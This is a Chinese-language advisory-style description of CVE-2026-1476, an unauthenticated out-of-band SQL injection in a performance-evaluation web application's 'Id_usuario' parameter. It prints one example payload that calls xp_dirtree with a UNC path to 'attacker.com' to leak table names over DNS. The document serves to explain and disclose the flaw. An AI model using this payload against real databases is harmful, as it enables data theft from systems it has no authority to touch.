CVE-2026-1476CVE-2026-1476是Gabinete Técnico de Programación开发的Performance Evaluation(绩效评估,EDD)应用中存在的一个高危带外SQL注入漏洞(Out-of-Band SQL Injection,OOB SQLi)。该漏洞存在于'/evaluacion_acciones_ver_auto.aspx'页面的'Id_usuario'参数中,CVSS评分达到7.5,属于高危级别。攻击者无需任何认证即可远程利用此漏洞,通过构造恶意SQL查询语句,利用数据库的外部通道功能(如DNS查询、HTTP请求等)将敏感数据提取出来。由于是带外注入技术,即使应用程序本身不直接返回数据库查询结果,攻击者仍可通过观察外部通道的响应来获取数据。该漏洞严重威胁系统数据的机密性,可能导致用户信息、业务数据等敏感内容泄露。
该漏洞是典型的带外SQL注入(OOB SQLi)漏洞,区别于传统的内联SQL注入,带外注入通过数据库的辅助功能(如xp_dirtree、UTL_HTTP、SMB共享等)实现数据外传。攻击者通过在'Id_usuario'参数中注入恶意SQL语句,利用SQL Server的扩展存储过程或Oracle的UTL_HTTP包等特性,将查询结果编码后通过DNS请求或HTTP请求发送到攻击者控制的外部服务器。具体利用时,攻击者构造类似';DECLARE @cmd VARCHAR(500); SET @cmd='\\attacker.com\'+(SELECT TOP 1 table_name FROM information_schema.tables); EXEC master..xp_dirtree @cmd;-- 的Payload,通过xp_dirtree触发DNS解析,将数据库中的表名、列名等元数据或用户数据附加到DNS查询中。攻击者只需监听DNS服务器或HTTP服务器的日志即可获取这些数据。此类漏洞特别危险,因为传统的WAF和IPS可能无法检测到这种通过合法协议通道传输数据的攻击行为。